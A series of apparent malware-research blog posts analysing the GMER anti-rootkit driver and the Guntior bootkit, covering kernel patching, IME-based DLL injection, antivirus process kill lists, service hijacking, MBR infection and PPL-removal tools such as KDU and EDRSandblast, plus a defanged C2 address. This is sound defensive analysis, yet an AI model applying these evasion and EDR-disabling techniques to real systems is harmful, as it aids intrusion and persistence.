The second driver iaStorVD.sys relies on its counterpart storport.sys. The latter is a general-purpose storage driver responsible for managing communication between storage devices and the operating system itself. While iaStorVD.sys provides functionality for managing RAID arrays and handling I/O requests for devices connected to the Intel RAID controller, storport.sys is directly responsible for communication with storage devices. Thus, Storport.sys operates at a lower level than iaStorVD.sys, providing basic communication and data transfer functionality with the storage hardware.

iaStorVD.sys also creates one more device incorporated in another device stack that ends up in Pci.sys. It's used to handle requests for the PCI bus driver Pci.sys.

🛠️ Patching kernel data

GMER aims to patch kernel mode code and disk port driver data in two cases mentioned below. In both of them, it is interested in intercepting control of the disk I/O operation before the disk port driver returns control to the client. The driver parses the SCSI_REQUEST_BLOCK structure and, in particular, its Cdb structure to obtain information about the LBA and the size of the requested data.

The anti-rootkit driver overwrites the IAT entry of the disk port driver that matches the IofCompleteRequest function with a GMER's one.
It also implements run-time code patching. First 0xF bytes of ataport!IdePortDispatch->ataport!IdePortPdoDispatch are subject to this modification in the case of a sector write operation.

GMER puts the following instruction at the beginning of ataport!IdePortPdoDispatch. A pointer to its implementation of IofCompleteRequest follows the instruction.

While the address of ataport!IdePortDispatch can simply be obtained from the driver's dispatch function table, to find the address of ataport!IdePortPdoDispatch GMER needs to check the body of the first function for a specific signature chain. This signature chain is presented below.

Below you can see part of the code that implements the interception of the ataport!IdePortPdoDispatch function. The first call is used to modify that function and copy the old 0xF bytes. The second one saves the copied old bytes to the global driver data.

It's worth noting that the GMER function for patching kernel mode code isn't safe for use in multiprocessor systems (SMP). Instead of raising IRQL on all CPUs, the driver does this only on the current one. GMER implements a typical method for patching kernel mode data as follows.

🔑 Securing disk I/O operations

The driver provides GMER with the ability to work with disk at a low level by addressing directly to the Atapi/Ataport or Scsiport disk drivers. It builds a request packet and sends it to one of them through the IRP_MJ_INTERNAL_DEVICE_CONTROL request depending on which one is active in the system.

The driver receives the name of the disk device object from its user-mode counterpart. Before sending a request to the disk device, the driver obtains the pointer to the lowest device on the stack using IoGetBaseFileSystemDeviceObject, thus bypassing all potentially non trusted devices.

struct _CDB10 {

UCHAR OperationCode;

...

UCHAR LogicalUnitNumber : 3;

UCHAR LogicalBlockByte0;

UCHAR LogicalBlockByte1;

UCHAR LogicalBlockByte2;

UCHAR LogicalBlockByte3;

...

UCHAR Control;

} CDB10, *PCDB10;

Before calling the disk driver, GMER patches its IAT entry matching the IofCompleteRequest function to GMER's one.

GMER supports IOCTL code 0x7201C008 to perform secure disk I/O operation for its user-mode application. Below you can see its pseudo code, which omits minor operations.

GMER has several I/O completion routines that are designed to be used in multiple anti-rootkit scenarios when processing disk I/O operations.

The first is used to secure (intercept) the disk read operation (IRP_MJ_INTERNAL_DEVICE_CONTROL, SCSIOP_READ) globally (IOCTL 0x7201C020). Its pointer replaces IofCompleteRequest in the disk port driver IAT entry and is used to copy read data from the system buffer to the GMER's one.
Another one is involved in securing the disk write op (IRP_MJ_INTERNAL_DEVICE_CONTROL, SCSIOP_WRITE) globally (IOCTL 0x7201C02C). The driver uses a pointer to this function in the patching code for ataport!IdePortPdoDispatch. This routine is used to prohibit write access to disk sectors (LBA) supplied from user mode .
The latter is used to dispatch the initiated disk I/O request coming from the GMER app (IOCTL 0x7201C008).

In addition to those IOCTLs, GMER has a feature to scan the classpnp handlers for potential run-time hooks (0x9876C058). The driver obtains the handler offset inside the classpnp driver file, its SYSTEM_MODULE_ENTRY.ImageBase, and checks its prologue for two signature sequences: 0x55 0x8B 0xEC, 0x8B 0xFF 0x55.

But it's unclear why the 64-bit GMER driver checks the classpnp dispatch functions for x86 instructions...

🗃️ Securing file I/O operations

GMER secures file operations as follows.

To open a file, the driver calls the IoCreateFileSpecifyDeviceObjectHint API, sending a request directly to the FSD, skipping possible intermediate filters. To obtain a pointer to the FSD device object that is the lowest on the stack, it uses IoGetBaseFileSystemDeviceObject (IoGetDeviceAttachmentBaseRef).
If the function fails, GMER tries to check IofCallDriver for hooks, but only its the old version, which has a jump instruction to the IopfCallDriver pointer at the beginning.
In addition to checking IofCallDriver for hooks, the driver also checks and restores the original IRP_MJ_CREATE handlers for Ntfs and Fastfat driver objects. As was mentioned above, GMER obtains these handlers at the driver initialization phase.
After obtaining a handle to the requested file, the driver uses the ordinary APIs ZwReadFile, ZwWriteFile, ZwDeleteFile, ZwQueryInformationFile, ZwSetInformationFile, ZwClose.

These operations are performed in the System process context.

The following pseudocode demonstrates how GMER secures file I/O operations.

⛓️Tracing kernel mode code

Along with information about system anomalies, GMER is also capable of providing details about possible code execution flow violations involved in processing file system operations. This feature is based on code tracing or single-step CPU mode, when the driver code intercepts control after each executed CPU instruction and saves information about each system module to which this instruction belongs. This mode is activated by setting the trap flag in the RFLAGS register {pushfq; pop rax; or eax 100h; push rax; popfq}.

Below you can see the driver code responsible for intercepting the int 1 handler and the corresponding x64 structures.

The driver interrupt handler is simply a wrapper, it prepares the necessary data on the stack and calls the real handler.

When tracing code, the driver maintains a context structure with several arrays that store information about system modules and their call stack frames. Then this data will be copied to the provided user buffer and analyzed by the application for the presence of unknown system modules.

The driver single step mode dispatch function looks as follows.

The above function is involved in code tracing in two scenarios - calling the FSD driver directly via IofCallDriver and ZwQueryDirectoryFile.

The second scenario.

📦About PPL'ed processes

PPL is a widely known built-in Windows security feature designed to provide high-end protection for trusted Windows services such as anti-malware processes. It's recognized as a robust security measure aimed at protecting running processes from any form of modification or other destructive impact. Access checks for PPL-protected processes are implemented at the opening process handle level, without any exceptions for kernel mode code. As a result, these processes cannot be terminated using ZwOpenProcess and ZwTerminateProcess calls made by the kernel mode driver.

The required access checks can only be successfully passed by code that works on another PPL protection level with an equal or higher one. GMER isn't an exception; like other renowned security tools, including, Process Explorer, Process Hacker, Process Informer, WinArk, it can't terminate PPL'ed processes. This limitation arises not only because it employs a simple trick involving a pair of aforementioned functions after attaching to the System process, but also due to its constraints when working on modern Windows versions. To terminate a PPL-protected process, kernel mode code requires a pointer to the kernel object of the process and a pointer to an internal ntoskrnl function, PspTerminateProcess, capable of process termination by a pointer rather than its handle.

GMER terminates the process as shown below (IOCTL 0x9876C094).

To make the process of finding PspTerminateProcess more reliable across Windows versions, a signature chain candidate should consist of unique byte sequences. GMER can easily find many Windows kernel undocs, so locating PspTerminateProcess shouldn't be difficult for it.

If we delve deeper, we find that the key function in the process of checking PPL protection is an open procedure for the process object type (PsProcessType) called PspProcessOpen. This is the only purpose of this function, which is responsible for comparing PSPROTECTION values of both processes. Before implementing PPL, the process kernel object didn't have the open procedure.

Below, you can see the process of obtaining a handle to the PPL'ed process, starting with the call of NtOpenProcess and ending with the actual validation of the protection.

The process of removing PPL protection could be simplified with just zeroing EPROCESS_Protection value that is used by the Windows kernel to set the corresponding level of protection. It's related to DKOM and there are several projects on GitHub demonstrating this method. It can also be used by attackers or defenders for the opposite purpose to enable the protection for specific processes, making them inaccessible for any kind of modification. Below you can see the corresponding structures describing PPL.

To disable PPL, the protection byte or all three fields should be set to zero (see Kernel Driver Utility, KDU).

To enable protection for the process (EDRSandblast).

The following projects on GitHub demonstrate this trick with disabling the PPL protection using DKOM, i e manually changing EPROCESS_Protection. In addition, from a blog post by Denis Skvortcov, we can learn that Avast security products set protection for their anti-malware services by manually PPL'ing the corresponding process.

https://github.com/Mattiwatti/PPLKiller

https://github.com/hfiref0x/KDU

https://github.com/wavestone-cdt/EDRSandblast/

The latter tool was reportedly utilized by the Midnight Blizzard TA to disable the protection of an installed anti-malware product. It's also capable of enabling protection for the current process. To RW kernel memory, this tool requires a driver that is vulnerable to BYOVD. As opposed to EDRSandblast, KDU comes with numerous vulnerable drivers so you don't need to find it yourself.

References

https://www.crowdstrike.com/blog/evolution-protected-processes-part-2-exploitjailbreak-mitigations-unkillable-processes-and/

https://www.alex-ionescu.com/146/

https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/srb/ns-srb-_scsi_request_block

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

↧

Guntior - the story of an advanced bootkit that doesn't rely on Windows disk drivers

April 14, 2024, 11:32 am

≫ Next: Windows Bootkits Guide

≪ Previous: GMER - the art of exposing Windows rootkits in kernel mode

I first stumbled upon this interesting malware sample about a decade ago, being a contributor to the kernelmodeinfo forum. Amid the rise of bootkits at that time, the dropper was captured in-the-wild and posted on one of malware trackers. The malware was called "Guntior", after the device object its authors had chosen for it (\Device\Guntior). The name also appears in AV detections.

At this time, most systems were x86, and thus didn't benefit from Kernel Patch Protection (KPP) or Driver Signing Enforcement. As a result, there was a lot of sophisticated malware loading unsigned drivers that used kernel mode hooks and direct disk access to hide malicious activity. Bootkits typically store their components in the disk sectors outside the normal file system and conceal their data from the rest of the operating system by returning zeroes or spoofed data in response to any requests for it

The analysis of any bootkit involves not only reverse engineering skills, but also forensic skills in order to extract the infected boot sector, MBR and malware modules from disk sectors.

Chapters:

The dropper
HIPS evasion
Disabling security software
Driver installation
Payload DLL
A few words about the Windows disk I/O subsystem
Low-level disk access via ATA PIO mode
Disk infection
Bootloader
Key takeaways
Appendix

The dropper

Okay, let's take a look at the dropper. The bootkit itself is encrypted and stored in the resources section of the malware dropper. The latter is wrapped in another dropper, which appears to have been downloaded by the user. Along with the bootkit, the resources section also incorporates other encrypted malware modules.

The bootkit dropper has several anti-debug and anti-analysis tricks to confuse a malware researcher. Its Original Entry Point (OEP) is called via a Structured Exception Handling (SEH) handler upon throwing an exception. To confuse a potential researcher, the dropper creates its copy on disk and converts this executable into a DLL. This trick is used to bypass HIPS sensors and explained later. After performing these anti-analysis tricks, it proceeds with execution.

HIPS evasion

The malware performs an interesting trick to inject its DLL into Explorer, which works on older versions of Microsoft Windows. This technique allows the malware to bypass HIPS checks and behavioral protection designed to detect malicious activity. In a nutshell, the malware itself doesn't inject the DLL into the target process, but causes the OS to do so.

The trick is based on using Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path, but writing any file path in the registry would trigger an alert of any behavioral protection. To avoid this, the malware intercepts the NtQueryValueKey API to provide the necessary DLL path. There's another important API in the event chain - ImmLoadLayout. It loads the malicious DLL In the context of the Explorer process, after receiving the aforementioned message.

Before doing these actions, the malware copies its executable to the system directory with a random name.tmp and patches its PE characteristics by setting the corresponding DLL flag, effectively converting it into a DLL. As it's not difficult to guess, this DLL is intended to be injected into Explorer as explained above.

Let's sum up this injection technique:

The malware copies its executable to the temp directory as a DLL.
Registers a new keyboard layout in the registry.
Intercepts ZwQueryValueKey in its own process to supply "Ime File" registry value with the malware DLL path to the OS.
Gets a handle to the Explorer window with FindWindow.
Send the WM_INPUTLANGCHANGEREQUEST message to that window.
The OS calls the ZwQueryValueKey hook to query the "Ime File" value of the newly registered keyboard layout and gets the DLL path.
Windows caches information about this keyboard layout.
Send the WM_INPUTLANGCHANGEREQUEST message again.
ImmLoadLayout loads the DLL into the Explorer process using the cached data.

Created keyboard layout data.

The following diagram explains this trick.

Disabling security software

Upon its successful execution, the DLL code sets an event to signal the dropper. This injected DLL is responsible for loading the bootkit driver, but before doing this, it tries to disable the following tools by sending the appropriate IOCTLs to their drivers or killing their processes.

360tray.exe, 360 Total Security by Qihoo 360
HintClient.exe by Shanghai Hintsoft Co., LTD, IOCTL code 0x00403A3B.
DrvMon tool by Fyyre and EP_X0FF, IOCTL code 0x00403B0A.
HardwareInfo.exe, part of the NetTools, IOCTL code 0x00220008.
CfgClt.exe
AVP.exe, Kaspersky security products
KSafeTray.exe, PC Doctor Flow Monitor (PC Doctor) by Kingsoft
RavMonD.exe, Rising AntiVirus by Beijing Rising Information Technology

For example, below you can see the code to disable DrvMon.

The bootkit is particularly interested in disabling ESET security products. It creates a separate thread in which it tries to terminate nod32krn.exe service in an infinite loop with a timeout of two seconds. To ensure that the process is killed, the driver is used.

Driver installation

Another interesting characteristic of this malware is how it installs and loads its driver. This tricky method is based on hijacking the Microsoft Trusted Audio Drivers service named drmkaud (drmkaud.sys) and utilizing PnP Manager to load it. To install the driver, the malware performs the following actions.

Selects a random name for its driver to be dropped into C:\Windows\System32.
Opens the registry key of Trusted Audio Drivers in HKLM\SYSTEM\CurrentControlSet\Enum\SW belonging to Device Manager with the full path HKLM\SYSTEM\CurrentControlSet\Enum\SW\GUID\GUID\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}. These GUIDs are stored in encrypted form.
Modifies the security descriptor allowing Everyone all access to those keys.
Sets ConfigFlags value to zero, replaces the original name of the service drmkaud with the malware's.
Creates the driver service key in HKLM\SYSTEM\CurrentControlSet\Services.
Extracts the driver from the resources section, decrypts it and drops it onto disk.

The Trusted Auto Driver Service in the Enum key is hijacked so that its GUID can be used to load the malicious driver via the PnP Manager. The malware repeatedly tries to open any device named \Device\000000NN, each time incrementing the N values until it succeeds. For each device the code sends a special IOCTL code supplying the aforementioned GUID, which is stored in encrypted form.

If this trick fails, the malware loads the driver as usual, manually creating its service. Once it's loaded, the malware starts infecting the disk.

Payload DLL

The dropper uses a similar trick to register the payload DLL in the system. Instead of simply dropping the DLL and registering it in autorun, it hijacks one of Windows standard services by rewriting its executable with the malware DLL. To defend against malware analysis, the malware stores a list of these DLL names in encrypted form and decrypts them only briefly to the stack, making it unlikely that an analyst will find these names in a memory dump.

Trying to hijack at least one of them, the malware targets the following Windows services:

AppMgmt - Software Installation Service
BITS - Background Intelligent Transfer Service
FastUserSwitchingCompatibility - Fast User Switching Compatibility service
WmdmPmSN - Portable Media Serial Number Service
xmlprov - Network Provisioning Service
EventSystem - Event System service
Ntmssvc - Removable Storage Service
upnphost - Universal Plug and Play Device Host Service
SSDPSRV - Simple Service Discovery Protocol service
Netman - Network Connections service
Nla - Network Location Awareness Service
Tapisrv - Telephony service
Browser - Browser service
CryptSvc - Cryptographic Services
helpsvc - Help Center Service
RemoteRegistry - Remote Registry service
Schedule - Schedule service

Below you can see the steps of this process. Before rewriting the system executable, the malware gets the address of SfcFileException export function in sfc_os.dll. Sounds familiar, right? This DLL implements the Windows System File Checker (SFC) API that can be used to scan or restore corrupted system files. The malware authors abuse one of these API functions to prevent SFC from automatically restoring the target system file after its modification.

The hijacked service DLL is responsible for communication with the driver, supplying it with pointers to undocumented ntoskrnl functions and kernel structure offsets, saving the driver from having to do it in kernel mode. The first IOCTL to be sent to the driver is 0x222440, which initializes it for further operation. The following data is to be sent.

Addresses of the following functions: MmGetSystemRoutineAddress, PspTerminateThreadByPointer, KeInsertQueueApc, KiInsertQueueApc;
First 12 bytes of each of those functions (their prologs); PspTerminateThreadByPointer;
The offsets of the following kernel structures are EPROCESS->ThreadListHead, ETHREAD->ThreadListEntry.

When the malware needs to terminate a specific process, it sends a special IOCTL containing the PID. The driver gets a EPROCESS pointer to this PID and enumerates all threads belonging to this processes using the supplied offsets of EPROCESS->ThreadListHead and ETHREAD->ThreadListEntry and for each of them calls PspTerminateThreadByPointer.

The DLL contains an impressive list of processes to be terminated. Some of them belong to well-known security companies.

ESET - nod32krn.exe, egui.exe, ekrn.exe;
Qihoo 360 - 360tray.exe, 360leakfixer.exe, 360Safe.exe, safeboxTray.exe, 360safebox.exe, 360sd.exe, ZhuDongFangYu.exe, 360rp.exe, 360sdupd.exe;
Kingsoft WebShield - KSWebShield.exe, kxesapp.exe, kxeserv.exe, kwstray.exe, kxedefend.exe, upsvc.exe, kxescore.exe, KVExpert.exe, kxetray.exe, KSafeSvc.exe, KSafeTray.exe;
Rising AntiVirus - RavMonD.exe, RsTray.exe, RsAgent.exe, RegGuide.exe, RsMain.exe, RsCopy.exe, Rav.exe;
Jiangmin Antivirus - KVSrvXP.exe, KVExpert.exe, KVMonXp.exe
Kaspersky - AVP;
Rising PC Doctor - ras.exe, knownsvr.exe, rstray.exe;
Tencent QQPCMgr - QQPCLeakScan.exe, QQPCWebShield.exe, QQPCTAVSrv.exe, QQPCRTP.exe, QQPCMgr.exe, QQPCUpdateAVLib.exe, QQPCTray.exe, QQRepair.exe, QQPCPatch.exe;
Other - Calc.exe (:D), guiyingfix.exe, knsdtray.exe, knsd.exe, knsdsvc.exe, knsdsve.exe.

Another interesting observation is that, before calling the undocumented function pointers passed from user mode, the driver first tries to restore the first 12 bytes of each function. The authors probably assumed that the drivers of some security products set hooks on these functions by patching their first bytes at runtime. The DLL provides the driver with these first 12 bytes, but before that, it copies them from ntoskrnl on disk, loading it into the process and finding those undocumented functions, i e PspTerminateThreadByPointer and KeInsertQueueApc. The screenshot below demonstrates this technique.

The code above walks through the list of all processes' threads as follows.

Now we can take a look at the entire malware installation routine.

The DLL is a core part of the malware, which acts as a bot and communicates with its control servers. The address is hard coded in the DLL. After connecting to 183[.]60[.]132[.]220, it tries to download one of the executable files with the names 1.exe, 2.exe, 3.exe, ..., 32.exe and run it in the system with the Explorer access token. Unlike TDL4, this bootkit isn't interested in protecting downloaded executables on disk. They are stored as regular files on volume and the bootkit doesn't restrict access to them.

A few words about the Windows disk I/O subsystem

Being the OS that is based on the hybrid kernel architecture satisfying the highest standards, Windows has the multi-layered disk I/O architecture. It's based on the device stack model, where each layer is represented by a separate kernel mode driver. One of the main advantages of this approach is that each of these layers is isolated from others and can use the unified Windows I/O subsystem's interfaces to communicate with other drivers on the stack. For example, the File System Driver (FSD) can dynamically attach its device to the existing disk device stack to dispatch file operations.

At the top of this device stack is the FSD (ntfs.sys), which handles file operations and attaches its device to the lower one belonging to the volume manager (volmgrx.sys). In order to operate files data, the FSD converts file offsets to the volume ones and addresses volmgrx.sys. The latter converts its offsets to the disk ones and calls the disk driver disk.sys or it can reach out to the partition manager (partmgr.sys) that is also located down the device stack. Unlike the device belonging to the volume manager, the partition manager's one represents a raw disk partition without a file system. Upon receiving a request, disk.sys calls the disk port driver atapi.sys, clarifying exactly which device on the ATA bus it needs to reach. The disk port driver completes this request by communicating directly with the disk controller. The major difference between the FSD and other drivers on the stack is that the first should keep the context for any open file (FILE_OBJECT and its FsContext) while others simply operate with disk or volume offsets.

The driver objects of the aforementioned drivers were an attractive target for rootkits and bootkits in the x86 era. The malicious Ring 0 code aimed at modifying the function pointers in the drivers' dispatch table to intercept the I/O operations of interest. IRP_MJ_READ, WRITE, DEVICE_CONTROL were the primary targets. Thus, rootkit detectors had to go as low as possible to safely read disk sectors, skipping potentially infected drivers located higher on the stack.

Low-level disk access via ATA PIO mode

The rootkit includes a unique feature we haven't seen in other notorious bootkits such as TDL4, Rovnix or Mebroot. It's capable of communicating with the hard drive at the lowest level without calling any Windows disk or disk port drivers (disk.sys, atapi.sys).

In a nutshell, instead of sending the IOCTL_SCSI_PASS_THROUGH_DIRECT request to atapi, the rootkit works directly with the ATA bus via IO ports 0x170-0x177 and a device control register port such as 0x376. Once all the preparations are done, the rootkit calls hal!READ_PORT_BUFFER_USHORT to read data from disk or hal!WRITE_PORT_BUFFER_USHORT to write to it. At the beginning of this routine, the rootkit queries the information about the IDE controller using hal!HalGetBusData for PCIConfiguration.

In spite of the presence of this interesting feature, the malware uses it in very limited cases. These cases don't even require calculating disk offsets using the partition table.

To overwrite the MBR and drop the malware components onto the end of the disk during the disk infection process.
The disk infection watchdog thread reads the MBR every 5 seconds in an infinite loop.

The disk infection routine is located in the main dropper and called in the context of Windows Explorer process after code injection is done as described above. If the injection fails, the dropper calls this function in the context of its process.

The rootkit provides the malware with two disk communication IOCTLs. The first is used to select the drive on which the malware wants to perform the RW operation and another describes this request.

The rootkit uses the following ATA commands.

0x30 and 0x34 to write sectors in 28/48 bit PIO mode;
0x20 and 0x24 to read sectors;
0xEC - IDENTIFY command.

Before execution of any disk operation, the rootkit polls the drive to be sure that it's ready to transfer data.

To start using the IOCTL_ROOTKIT_READ_WRITE_DISK operation, the rootkit requires another IOCTL named IOCTL_ROOTKIT_SEND_MBR_SIGNATURE to be sent before. The latter is needed to prepare the rootkit internal structures for performing further I/O. This structure includes the following information: ATA bus port number, device control port number, ATA command type (8bit or 24). The rootkit globally stores this structure to supply the disk I/O functions with the necessary information required to perform I/O operations.

In order to get the necessary disk configuration information, the rootkit uses HalGetBusData with PCIConfiguration value as BusDataType and receives the PCI_COMMON_HEADER structure as output. In a loop, it iterates buses, slots, PCI classes, and subclasses until it gets PCI_CLASS_MASS_STORAGE_CTLR and PCI_SUBCLASS_MSC_IDE_CTLR. The implementation of the entire process of searching a specific drive is presented below.

From the rootkit code.

Now the malware can use IOCTL_ROOTKIT_READ_WRITE_DISK to write data to disk. Depending on the output of the IDENTIFY ATA command, the rootkit selects the appropriate type of the RW operation, 28 or 48 bit PIO (IDENTIFY_DEVICE_DATA.CommandSetSupport.BigLba). Let's look at the sequence of actions in case of processing 48 bit PIO RW operation.

To transfer the requested data the rootkit uses the aforementioned HAL functions READ_PORT_BUFFER_USHORT and WRITE_PORT_BUFFER_USHORT in a loop.

Summarizing the IOCTLs that the driver exposes.

IOCTL_ROOTKIT_KILL_PROCESS 0x222444 to kill the specified process, as input accepts a Process ID (PID).
IOCTL_ROOTKIT_INIT_DATA 0x222440 to initialize the rootkit structure containing undocumented offsets and functions, as input accepts initialized ROOTKIT_INIT_STRUCT (see below).
IOCTL_ROOTKIT_READ_WRITE_DISK 0x22243D to read/write disk data.
IOCTL_ROOTKIT_SEND_MBR_SIGNATURE to specify a disk to the rootkit for the following I/O operations.

Disk infection

Internally, the malware supports two mechanisms for accessing the disk in raw mode. It either calls CreateFile/ReadFile/WriteFile on PhysicalDrive0 when it's necessary to work with Master Boot Record (MBR) or uses the rootkit driver to communicate with the disk at a low level.

As is the case with its other components, the malware stores the bootkit 16-bit bootloader in the dropper's resource section in encrypted form. The first 0x200 bytes of this data represent the malicious MBR and the rest is supposed to be written at the end of the disk.

The following picture shows the bootkit data structure on disk.

The malware infects the disk as follows:

Send the signature of the disk to be infected to the rootkit (IOCTL_ROOTKIT_SEND_MBR_SIGNATURE).
Read the first 16 sectors of the disk with IOCTL_ROOTKIT_READ_WRITE_DISK or with CreateFile/ReadFile on \\.\PhysicalDrive0 if the rootkit driver failed to load. Frankly, I didn't get why the malware reads as many as 16 sectors as it uses only first one that represents the MBR to infect it.
Infect the MBR with the code from the 112 resource with 16-bit bootloader code.
Allocate a virtual memory region with the size of 0x7E00 (63 sectors) and copy there infected MBR, original MBR, the 16-bit bootcode and the payload DLL.
Overwrite the original MBR with the infected one.
Calculate the offset from the end of the disk to drop the bootkit data (DiskSize - 0x41 sectors).
Write the bootkit data to the end of the disk.

This is the last step of system infection.

Bootloader

The malicious bootstrap code located in the MBR is responsible for loading the bootloader from the end of the disk. Due to limitations of memory addressing in real mode, the bootstrap code first relocates itself from 0x7C00 to 0x600. This memory region starting 0x7C00 is used for further loading the bootloader data. As was mentioned above, the infected MBR stores the start LBA of the bootkit extension and its size in sectors.

The malicious bootloader has its own powerful FAT and NTFS parsers. The NTFS parser is capable of performing RW operations on files and walking through the directory hierarchy. After reading the bootkit extension, it prepares a special array describing partitions of each connected disk supporting ATA/PATA interfaces. The following structure stores an item of that array.

After completing this, the code copies a partition item for the selected partition to the stack. The bootkit also keeps a structure describing the file that the malware is interested in.

Thus the bootloader internally supports two I/O types - file I/O and disk I/O. The appropriate functions work with file context (file array) and partition context (partition array). According to the code, the only file the bootkit is interested in - C:\WINDOWS\System32\sfc_os.dll and the path is stored in encrypted form. The following NTFS structures are key to understanding its parser.

Understanding NTFS is a separate long story, so we'll limit ourselves to presenting these two structures. The code of this parser is quite large. It's capable of working with all the necessary resident and non-resident file attributes, including, INDEX_ROOT and INDEX_ALLOCATION for recursive directory traversal.

Below you can see an example of an MFT record describing explorer.exe. The record has several standard file attributes, each of which has a header (ATTR_RECORD). A file attribute can be resident (fits into the MFT record) and non-resident.

$STANDARD_INFORMATION (0x10) - contains the basic file information such as the date of creation and modification, attributes, owner and security IDs.
$FILE_NAME (0x30) - contains the file name, a ref to the file directory and its size.
$DATA (0x80) is responsible for storing file data.

The $DATA attribute stores all necessary information to be useful to find file data. But the process of raw parsing FS data to get its content is more complicated in the case of a non-resident attribute. The parser needs to analyze a run list and convert VCN to LCN instead of just reading the attribute body inside the MFT record.

This is how part of the malicious bootloader's NTFS file read/write function looks like.

The code below represents a file system independent function that the bootloader uses to write a file.

Thus the bootkit works with FS as follows: creates a context for the targeted partition where the file is located, searches the file on this partition (volume) parsing the FS structures and creates a context for the found file.

The bootloader also intercepts int 13h in order to replace data of original MBR if someone tries to read it.

After intercepting int 13h, the bootloader transfers control to the original bootstrap code, which it previously read from disk.

Unfortunately, while reversing the bootloader, I didn't manage to get a clear answer about how sfc_os.dll is patched, but according to its behavior and indirect evidence, it appears to overwrite the legitimate DLL with a bootkit payload one. One of the proofs is that after infection the payload DLL and sfc_os.dll are identical. Another one is that the payload DLL has sfc_os.dll stub exports, each of which returns the appropriate value of interest to the malware.

Key takeaways

The direct disk access feature is quite unique for malware - it's not clear what advantages it provides for the authors. The rootkit doesn't intercept the disk or disk port driver dispatch functions to hide its malicious sectors so any disk dumper tool can be used to detect these anomalies. One can only assume that the authors decided to rely on that comprehensive list of security products to be disabled rather than on hiding malicious activity in the live system.

Unlike its notorious counterparts such as Tdss (Tidserv) or Rovnix, this bootkit doesn't support its own disk partition and file system to store the malware modules. The original MBR and malware modules are simply written to the end of the disk without any additional preparations. This hints to us that the malware doesn't support a plugin architecture and its features are limited to the original ones implemented in the payload DLL.

MITRE ATT&CK matrix (clickable)

Unfolded version (clickable)

Big thanks to Gabriel Landau for his review and Matthew Hickey, Rong Hwa Chong, Tom Kallo for their feedback. Much appreciated.

Appendix

Used tools

Malware research: IDA Pro, Cerbero PE Insider, Disk Explorer for NTFS, WinDbg legacy, Hiew, VMware running Win7.

Editing pics: Paint, ZoomIt.

Diagrams: Word 365.

Necessary skills

Windows Internals, reverse engineering, malware analysis, forensics.

Fingerprints

First level dropper

e49ad00deda88a198f2728a3d276f0b55f892d3088bc861538a005e443d81a92

Main dropper

b32cf71e325ceaa8982e6ebed33f95894f2591397e08404368fbaa6dce1095e3

Payload DLL

eddbe87f2009cb3199def0845ccf01d0397c126aca6f55e2a9516616825cebb1

Driver (rootkit)

4fdc39276228cab7ef1ef26a084e920760fdaacd78b29e776f09da0a95ae39b0

Bootloader

8eb365237e4cfe478b228d276598ff58c0b133fbcd374024b5903137cf196a3d

For download:

https://www.kernelmode.info/forum/viewtopicf771-3.html?p=14683#p14683

Previous studies

https://zerosecurity.org/2013/06/guntior-bootkit-upgraded/

https://www.kernelmode.info/forum/viewtopicf168-2.html?f=16&t=1765

References

https://thestarman.pcministry.com/asm/mbr/NTFSBR.htm

https://thestarman.pcministry.com/asm/mbr/VistaVBR.htm

https://wiki.osdev.org/ATA_PIO_Mode

http://ntfs.com/ntfs-partition-boot-sector.htm

https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ata/ns-ata-_identify_device_data

https://wiki.osdev.org/ATA_Command_Matrix

https://github.com/microsoft/Windows-driver-samples/blob/main/storage/tools/spti/src/spti.c

https://learn.microsoft.com/en-us/previous-versions/windows/hardware/kernel/ff546644(v=vs.85)

https://wiki.osdev.org/PCI

https://forum.osdev.org/viewtopic.php?f=1&t=30125

https://codemachine.com/downloads/win71/wdm.h

https://reactos.org/forum/viewtopic.php?t=14520

https://systemroot.gitee.io/pages/apiexplorer/d5/d3/pci_8h-source.html

https://mybogi.files.wordpress.com/2011/08/interrupt-13h.pdf

https://en.wikipedia.org/wiki/DOS_memory_management

https://doxygen.reactos.org/d4/d45/drivers_2bus_2pcix_2enum_8c_source.html

↧

Windows Bootkits Guide

May 10, 2024, 2:11 am

≫ Next: Windows Rootkits Guide

≪ Previous: Guntior - the story of an advanced bootkit that doesn't rely on Windows disk drivers

There are two main sections in the article, an infographic and web links to researches, samples and sources. The Year column indicates the year of the malware's appearance or when the information became public, Infection refers to the disk entity to be infected (Master Boot Record, UEFI, Volume Boot Record), the detection names of three security vendors and the purpose of the payload.

✨eEye BootRoot

Bootkit Threat Evolution in 2011
https://www.welivesecurity.com/2012/01/03/bootkit-threat-evolution-in-2011-2/

↧

Windows Rootkits Guide

June 4, 2024, 12:27 am

≫ Next: Windows Rootkits (and Bootkits) Guide v2

≪ Previous: Windows Bootkits Guide

Glad to present my deep dive into Windows rootkit families from early concepts to the latest sophisticated instances. This is an attempt to summarize information about them and highlight the Windows Internals tricks they leverage to achieve the necessary goals. The document includes a lot of links to information sources that cover the necessary Windows Internals knowledge and rootkit TTPs, so if u're not familiar with the topic, u can learn it from scratch. The link to the pdf is below.

https://artemonsecurity.com/windows_rootkits.pdf

↧

Windows Rootkits (and Bootkits) Guide v2

July 1, 2024, 1:24 pm

≫ Next: The final post

≪ Previous: Windows Rootkits Guide

The picture from the movie Elysium

Hello folks and have a good day. If u follow my blog, u might know that my two previous blog posts discussed km malware - rootkits and bootkits - focusing on the Ring 0 tricks they employ and the timeline of their appearance. I'm excited to share version two of my research paper "Windows Rootkits Guide", now titled "Windows Rootkits and Bootkits Guide," which includes even more information than the first version. The biggest addition is a deep dive into bootkit families and the techniques they use (TTPs), alongside more details about rootkit techniques.

https://artemonsecurity.com/rootkits_bootkits_v2.pdf

The document is intended to be a comprehensive guide to Windows km malware, with some exceptions and remarks as noted in it. Just like the first version, this guide includes direct document references to the researches, from which the information was taken. It has the structure of a reference book, which allows you to easily navigate from a specific malware family to its rootkit TTPs (Windows kernel tricks).

The new document covers information about:

More than 70 rootkit techniques and km tricks
More than 90 rootkit and bootkit families
Almost 300 web links to malware researches

The following techniques are included:

Intercepting system services with 6 sub-techniques
Direct Kernel Object Manipulation (DKOM) with 15 sub-techniques
Inline patching kernel mode code with 9 sub-techniques
Intercepting driver object major functions and 10 sub-techniques
Intercepting IDT/ISR
